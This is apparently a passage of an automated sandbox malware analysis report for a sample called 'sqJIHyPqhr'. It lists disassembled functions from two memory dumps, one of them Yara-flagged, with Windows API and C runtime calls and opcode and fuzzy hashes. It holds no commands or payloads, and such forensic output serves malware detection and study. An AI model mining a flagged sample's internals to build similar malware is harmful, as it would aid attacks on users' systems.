                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      • Opcode ID: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                                      • Instruction ID: 88b06bfc0f62aa8935fa323e363d542e538bb6ec90b14b7fccbc0ee81c7f4c38
                                                                      • Opcode Fuzzy Hash: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                                      • Instruction Fuzzy Hash: 3261D271900215AFDB20CFAAC851B9EBBF6EF45710F2441ABE844EB341D771A981CF51
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      • Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                                      • Instruction ID: bfd9ead29151d2877f631d1061df4e601ee651aa38b3335c59b440bd117a4214
                                                                      • Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                                      • Instruction Fuzzy Hash: 9361F171900205AFDB20DF69C842B9EBBF4EB08710F14516BE884EB382E7399D41CB59
                                                                      APIs
                                                                      • GetConsoleCP.KERNEL32(?,024CC4A4,E0830C40,?,?,?,?,?,?,024D425F,024AE03C,024CC4A4,?,024CC4A4,024CC4A4,024AE03C), ref: 024D3B2C
                                                                      • __fassign.LIBCMT ref: 024D3BA7
                                                                      • __fassign.LIBCMT ref: 024D3BC2
                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,024CC4A4,00000001,?,00000005,00000000,00000000), ref: 024D3BE8
                                                                      • WriteFile.KERNEL32(?,?,00000000,024D425F,00000000,?,?,?,?,?,?,?,?,?,024D425F,024AE03C), ref: 024D3C07
                                                                      • WriteFile.KERNEL32(?,024AE03C,00000001,024D425F,00000000,?,?,?,?,?,?,?,?,?,024D425F,024AE03C), ref: 024D3C40
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                      • String ID:
                                                                      • API String ID: 1324828854-0
                                                                      • Opcode ID: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
                                                                      • Instruction ID: 9b1e56b38bda6480e825d8161c508a333082f189903fcd540619dd84be33695c
                                                                      • Opcode Fuzzy Hash: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
                                                                      • Instruction Fuzzy Hash: F651E375A00208AFDB10CFA8D894AEEBBF4EF09704F1445AFE545E7291D7309A81CF61
                                                                      APIs
                                                                      • GetConsoleCP.KERNEL32(?,0042C23D,E0830C40,?,?,?,?,?,?,00433FF8,0040DDD5,0042C23D,?,0042C23D,0042C23D,0040DDD5), ref: 004338C5
                                                                      • __fassign.LIBCMT ref: 00433940
                                                                      • __fassign.LIBCMT ref: 0043395B
                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,0042C23D,00000001,?,00000005,00000000,00000000), ref: 00433981
                                                                      • WriteFile.KERNEL32(?,?,00000000,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339A0
                                                                      • WriteFile.KERNEL32(?,0040DDD5,00000001,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339D9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                      • String ID:
                                                                      • API String ID: 1324828854-0
                                                                      • Opcode ID: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
                                                                      • Instruction ID: 0964c92a74c3400c6cb4ab9b4b67413798647f05f85f7adc4f4dadb846cf7038
                                                                      • Opcode Fuzzy Hash: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
                                                                      • Instruction Fuzzy Hash: 3451C271E00209AFDB10DFA8D885BEEBBF4EF09301F14412BE556E7291E7749A41CB69
                                                                      APIs
                                                                      • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 024C4ACD
                                                                        • Part of subcall function 024C4D9C: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,024C4800), ref: 024C4DAC
                                                                      • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 024C4AE2
                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 024C4AF1
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024C4AFF
                                                                      • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 024C4B75
                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 024C4BB5
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024C4BC3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                                      • String ID:
                                                                      • API String ID: 3151764488-0
                                                                      • Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                                      • Instruction ID: 0875ea5048e981624fad59838c0fe59fe388e1fa9d677430487d7972d671a114
                                                                      • Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                                      • Instruction Fuzzy Hash: 3131C43DA002149BCF45EF6DC9A1B6E73B6BF44310F30456ED92597381EB70EA01CA94
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
                                                                      • Instruction ID: b9815d60f90e03f406f23d24981ab284aeb63e4d6947556696c8ee02ca3ea9ae
                                                                      • Opcode Fuzzy Hash: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
                                                                      • Instruction Fuzzy Hash: AD11B475604115BBDB312F7ADC58A6B7AADEF82B61B110A2FFC16C7250DB308855CAB0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                                      • Instruction ID: 860e752c6eb2c716a5d855c3c03ea0c0e6c73714a276bf2c7701abe861d4aafe
                                                                      • Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                                      • Instruction Fuzzy Hash: 51113A72A00216BFD7206FB7AC04F6B7B6CEF8A735F10123BF815C7240DA3889048669
                                                                      APIs
                                                                        • Part of subcall function 024DA331: _free.LIBCMT ref: 024DA35A
                                                                      • _free.LIBCMT ref: 024DA638
                                                                        • Part of subcall function 024D36D1: HeapFree.KERNEL32(00000000,00000000,?,024DA35F,?,00000000,?,00000000,?,024DA603,?,00000007,?,?,024DA9F7,?), ref: 024D36E7
                                                                        • Part of subcall function 024D36D1: GetLastError.KERNEL32(?,?,024DA35F,?,00000000,?,00000000,?,024DA603,?,00000007,?,?,024DA9F7,?,?), ref: 024D36F9
                                                                      • _free.LIBCMT ref: 024DA643
                                                                      • _free.LIBCMT ref: 024DA64E
                                                                      • _free.LIBCMT ref: 024DA6A2
                                                                      • _free.LIBCMT ref: 024DA6AD
                                                                      • _free.LIBCMT ref: 024DA6B8
                                                                      • _free.LIBCMT ref: 024DA6C3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                      • Instruction ID: 1e2290a96dfed7973839b9a09976dd47159d8499feb778fb7522d2736dd6660c
                                                                      • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                      • Instruction Fuzzy Hash: 49115171644B14ABDE30BBB3CC65FCF7B9FDF01B00F40082EA299AA190DAA5B5148E51
                                                                      APIs
                                                                        • Part of subcall function 0043A0CA: _free.LIBCMT ref: 0043A0F3
                                                                      • _free.LIBCMT ref: 0043A3D1
                                                                        • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                        • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                      • _free.LIBCMT ref: 0043A3DC
                                                                      • _free.LIBCMT ref: 0043A3E7
                                                                      • _free.LIBCMT ref: 0043A43B
                                                                      • _free.LIBCMT ref: 0043A446
                                                                      • _free.LIBCMT ref: 0043A451
                                                                      • _free.LIBCMT ref: 0043A45C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                      • Instruction ID: 8be3f6aa1696d7c36a68609bae5c6e68c8e713719265dd61fa4e844ff8b4370f
                                                                      • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                      • Instruction Fuzzy Hash: C611B472581B04A6E531BF72CC0BFCB77AD6F18305F40581EB6DA7B052CA2CB5144B46
                                                                      APIs
                                                                      • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,024B0DA0,?,?,?,00000000), ref: 024B2667
                                                                      • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,024B0DA0,?,?,?,00000000), ref: 024B266D
                                                                      • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,024B0DA0,?,?,?,00000000), ref: 024B269A
                                                                      • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,024B0DA0,?,?,?,00000000), ref: 024B26A4
                                                                      • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,024B0DA0,?,?,?,00000000), ref: 024B26B6
                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024B26CC
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024B26DA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                      • String ID:
                                                                      • API String ID: 4227777306-0
                                                                      • Opcode ID: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
                                                                      • Instruction ID: dd7eb2b33ecf06007c0eae1226634b754f84f9ecfd3c2023df9df350be9f62d9
                                                                      • Opcode Fuzzy Hash: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
                                                                      • Instruction Fuzzy Hash: A601A739501115A7D722FF76EC49FEF3768AF42F52B50082BF805D2160DBA4D9048AB8
                                                                      APIs
                                                                      • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412400
                                                                      • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412406
                                                                      • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412433
                                                                      • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 0041243D
                                                                      • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 0041244F
                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412465
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00412473
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                      • String ID:
                                                                      • API String ID: 4227777306-0
                                                                      • Opcode ID: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
                                                                      • Instruction ID: 91daacb073e6275429519e5223cc2729029c874a602b9c25603bfcabc23aa3f5
                                                                      • Opcode Fuzzy Hash: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
                                                                      • Instruction Fuzzy Hash: 4001F734600121ABC714AF66ED0ABEF3768AF42B56B60042BF905E2161DBACDA54866D
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,024B670B), ref: 024B24B6
                                                                      • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 024B24C4
                                                                      • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 024B24D2
                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,024B670B), ref: 024B2500
                                                                      • GetProcAddress.KERNEL32(00000000), ref: 024B2507
                                                                      • GetLastError.KERNEL32(?,?,?,024B670B), ref: 024B2522
                                                                      • GetLastError.KERNEL32(?,?,?,024B670B), ref: 024B252E
                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024B2544
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024B2552
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                      • String ID: kernel32.dll
                                                                      • API String ID: 4179531150-1793498882
                                                                      • Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                                      • Instruction ID: c6546b899ecf4e53be239df79c363e2d26ac8b115e56616000b25bd2ce47c9e5
                                                                      • Opcode Fuzzy Hash: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                                      • Instruction Fuzzy Hash: 8CF0A9759003103FFB127B757C5995B3FADDD4AA23320063BF811E2291EBB9D5418578
                                                                      APIs
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C677
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: Exception@8Throw
                                                                      • String ID: F(@$F(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                      • API String ID: 2005118841-3619870194
                                                                      • Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                      • Instruction ID: df443d8f91edbbbc86da8982951f5297a94925b32ed328c00139598aac834c40
                                                                      • Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                      • Instruction Fuzzy Hash: FAF0FC72900204AAC714D754CC42FAF33545B11305F14867BED42B61C3EA7EA945C79C
                                                                      APIs
                                                                        • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                        • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                        • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                      • _memcmp.LIBVCRUNTIME ref: 0043116C
                                                                      • _free.LIBCMT ref: 004311DD
                                                                      • _free.LIBCMT ref: 004311F6
                                                                      • _free.LIBCMT ref: 00431228
                                                                      • _free.LIBCMT ref: 00431231
                                                                      • _free.LIBCMT ref: 0043123D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorLast$_memcmp
                                                                      • String ID:
                                                                      • API String ID: 4275183328-0
                                                                      • Opcode ID: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
                                                                      • Instruction ID: 3f2797ad77f757c3ae12916b07ca9a57840cbe3c0d6446731fa2169183c3460f
                                                                      • Opcode Fuzzy Hash: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
                                                                      • Instruction Fuzzy Hash: 57B13975A016199FDB24DF18C884AAEB7B4FF48314F1086EEE909A7360D775AE90CF44
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,024D25EC,00000001,00000001,?), ref: 024D23F5
                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,024D25EC,00000001,00000001,?,?,?,?), ref: 024D247B
                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 024D2575
                                                                      • __freea.LIBCMT ref: 024D2582
                                                                        • Part of subcall function 024D390E: RtlAllocateHeap.NTDLL(00000000,024ADAD7,00000000), ref: 024D3940
                                                                      • __freea.LIBCMT ref: 024D258B
                                                                      • __freea.LIBCMT ref: 024D25B0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1414292761-0
                                                                      • Opcode ID: a510e50ab4e30f723abca725981774e3b8e951c367f08997725210aeddea5634
                                                                      • Instruction ID: 772b3558f20e2a60af955ca66129888e15ec5cb1a7c5b650830d37b680444e98
                                                                      • Opcode Fuzzy Hash: a510e50ab4e30f723abca725981774e3b8e951c367f08997725210aeddea5634
                                                                      • Instruction Fuzzy Hash: 2451E372A00216ABDB25CF64CC70EBFB7AAEB44754F15466EFC04D6241DBB4DD41CA60
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __cftoe
                                                                      • String ID:
                                                                      • API String ID: 4189289331-0
                                                                      • Opcode ID: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                                      • Instruction ID: a4642f3a175eb6cd3e7c7215c4128652134d6baad2b701b7be03cbac48a5130a
                                                                      • Opcode Fuzzy Hash: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                                      • Instruction Fuzzy Hash: D151FC39B00205ABDFA49F9DCC40B6F77A9EF48374F30416FE815D2281EB35D5018A68
                                                                      APIs
                                                                      • Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 024C3051
                                                                        • Part of subcall function 024B8AB2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 024B8ABD
                                                                      • SafeSQueue.LIBCONCRT ref: 024C306A
                                                                      • Concurrency::location::_Assign.LIBCMT ref: 024C312A
                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 024C314B
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024C3159
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
                                                                      • String ID:
                                                                      • API String ID: 3496964030-0
                                                                      • Opcode ID: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
                                                                      • Instruction ID: ee18b791b93dfc6af765382100c0301b5c22d95bbb1e5c0fda464add2fc1a146
                                                                      • Opcode Fuzzy Hash: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
                                                                      • Instruction Fuzzy Hash: ED31D535A006119FCB65EF6AC844AAABBB5EF44720F20859ED8068B355DB70E945CFD0
                                                                      APIs
                                                                      • FindSITargetTypeInstance.LIBVCRUNTIME ref: 024C8F77
                                                                      • FindMITargetTypeInstance.LIBVCRUNTIME ref: 024C8F90
                                                                      • FindVITargetTypeInstance.LIBVCRUNTIME ref: 024C8F97
                                                                      • PMDtoOffset.LIBCMT ref: 024C8FB6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FindInstanceTargetType$Offset
                                                                      • String ID:
                                                                      • API String ID: 1467055271-0
                                                                      • Opcode ID: 6fe96d91ed349e682c0e64a172f602ef2dce5d8881000acf6ba3df64c6c4f2c7
                                                                      • Instruction ID: 7aa818398363302f4dcc635e9df35b91275b6bd7adb8422c8734accd8e7ce0d2
                                                                      • Opcode Fuzzy Hash: 6fe96d91ed349e682c0e64a172f602ef2dce5d8881000acf6ba3df64c6c4f2c7
                                                                      • Instruction Fuzzy Hash: 0721277A604208AFDF56DF6DD845AAE77A6EF45764B30821FE90293280E731E501CA94
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                                      • String ID:
                                                                      • API String ID: 1687354797-0
                                                                      • Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                                      • Instruction ID: 903db547a3281466db16d92d1484d2e48002bd9fabe0bc15142089328111c5b1
                                                                      • Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                                      • Instruction Fuzzy Hash: C5218072C04208AADF15EBB9E860BDEB7F9AF28315F14401FE504B7280DB759A448F75
                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,024C9038,024C69C9,024E0907,00000008,024E0C6C,?,?,?,?,024C3CB2,?,?,0045A064), ref: 024C904F
                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 024C905D
                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 024C9076
                                                                      • SetLastError.KERNEL32(00000000,?,024C9038,024C69C9,024E0907,00000008,024E0C6C,?,?,?,?,024C3CB2,?,?,0045A064), ref: 024C90C8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLastValue___vcrt_
                                                                      • String ID:
                                                                      • API String ID: 3852720340-0
                                                                      • Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                      • Instruction ID: dc05bd5aa21f5703b4d0da85884125c39283d82eb820003b445d9b149944b829
                                                                      • Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                      • Instruction Fuzzy Hash: 3B01D83A2097217EA6A42BBF7C889772745EB05776B30033FE521453E5EF1288554D89
                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,25439A21), ref: 00428DE8
                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428DF6
                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428E0F
                                                                      • SetLastError.KERNEL32(00000000,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,25439A21), ref: 00428E61
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastValue___vcrt_
                                                                      • String ID:
                                                                      • API String ID: 3852720340-0
                                                                      • Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                      • Instruction ID: 8d354f8c373550ad8ca54886775f1e1f72959a5719103f68ef850459183cda9d
                                                                      • Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                      • Instruction Fuzzy Hash: 5801283630A7316EA7242BF57C8956F2744EB0677ABA0033FF414913E2EF194C21950D
                                                                      APIs
